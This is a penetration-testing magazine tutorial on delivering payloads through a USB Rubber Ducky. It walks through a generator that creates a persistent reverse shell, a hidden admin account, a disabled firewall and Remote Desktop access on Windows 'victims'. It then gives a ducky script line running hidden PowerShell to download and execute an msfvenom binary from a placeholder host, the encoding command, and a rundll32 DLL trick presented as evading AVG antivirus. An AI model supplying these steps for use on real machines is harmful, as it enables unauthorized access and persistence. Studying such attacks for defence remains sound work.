In this edition of Pentest Magazine I decided to write my article on Kali, USB Rubber Ducky and the Simple Ducky Payload Generator. I will take it a step further by utilizing msfvenom to create a custom exe to spawn a reverse shell and use a custom ducky script to deliver the payload. Why write an article on this topic? A few weeks back I was surfing Pluralsight and I stumbled upon a video by Troy Hunt and USB Rubber Ducky. He was discussing possible payloads that can be delivered through the evil HID. As of late I have been pondering on ways to educate SMBs on different techniques a simple payload can be executed to infiltrate their business undetected.
This article assumes that you are familiar with Kali Linux and it’s awesomeness. Now USB Rubber Ducky, if you’re not familiar with it:
“The USB Rubber Ducky is a Human Interface Device programmable with a simple scripting language allowing penetration testers to quickly and easily craft and deploy security auditing payloads that mimic human keyboard input. The source is written in C and requires the AVR Studio 5 IDE from atmel.com/avrstudio. Hardware is commercially available at hakshop.com. Tools and payloads can be found at usbrubberducky.com. Quack!”
README.txt copied from https://github.com/hak5darren/USB-Rubber-Ducky
USB Rubber Ducky is a commercial product. It’s worth the cash and fun to play with!
We’ll continue on to the Simple Ducky Payload Generator created by skysploit.
The generator can be downloaded at https://code.google.com/archive/p/simple-ducky-payload-generator/downloads. The version as of this writing is installer_v1.1.1_debian.sh.
Once you download the file onto your Kali system, navigate to the Downloads folder to run the file. You’ll need to change the permissions of the file prior to executing, see below. Instructions also found on web page, including YouTube video.
Below is a series of screenshots similar to what you should see during the installation process.
Now simply type simple-ducky to run the payload generator
Now for this article I will stick to option #2 since typically our victims will be Windows users. For this demo I will use a Windows 7 “Persistence Reverse Shell” as the payload.
You need to specify if the machine has UAC enabled. In my case it does so I enter Y.
At the next screen there are more questions to answer: what would you like the username & password of the newly created admin to be, what IP address to connect the reverse shell to, is UAC enabled?, etc ..
The success screen is as follows:
At this point you’ll be asked if you want to set up the ncat listener & if you want to return to the main menu. I entered yes to both prompts. As you see below a window opens with the created files, including the listener on whatever port you specified.
Now the next task would be to copy the inject.bin file from /usr/share/simple-ducky to the microSD card, which will afterwards be inserted into the ducky. The ducky would be inserted into the victim machine.
What will this payload do exactly? It will create a persistent shell, create a local admin account, drop the firewall and enable Remote Desktop/Remote Desktop Assistance.
Now this payload generator is a nifty tool but what if you want to generate you own payloads for whatever reason? First you’ll need the Duck Encoder, which can be downloaded from Hak5 Darren’s Github page (URL near top of article).
So now I will generate my own payload using msfvenom and ducky script.
On my Kali machine I created a 32-bit binary to run on my Windows box using the following command:
Now to create the ducky payload, thanks to Mubix.
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(‘http://www.yourwebsite.com/msfducky.old','%temp%\msfducky.exe'); Start-Process “%temp%\msfducky.exe”
Save it as payload.txt. Next the inject.bin file needs to be created, which is saved to the root of the ducky, the evil HID.
Usage (within Duck Encoder directory): java -jar -i payload.txt -o /media/root/XXXX-XXXX/inject.bin
XXXX-XXXX = name Kali gives to your ducky.
With your ducky carrying the payload, all you need to do is insert it into the victim machine. Ducky will do the rest. :)
Now, see below, how can we take this a step further? On one of my machines running AVG, it picked up my malicious binaries but not my malicious DLLs.
So what next? Create a ducky script to execute the malicious DLLs. On a Windows box you’ll execute the following command to execute the DLL:
C:\Windows\System32 (or SysWOW64)\rundll32.exe %temp%\msfducky.dll,duck
(duck = non-existent function but needed to properly execute the rundll32 command. You can use anything here such as aaaa)
In order to create the DLL payload, instead of using “-f exe” within msfvenom, you’ll use “-f dll”.
You might be asking, where is the ducky script? I’ll leave that to you .. :^P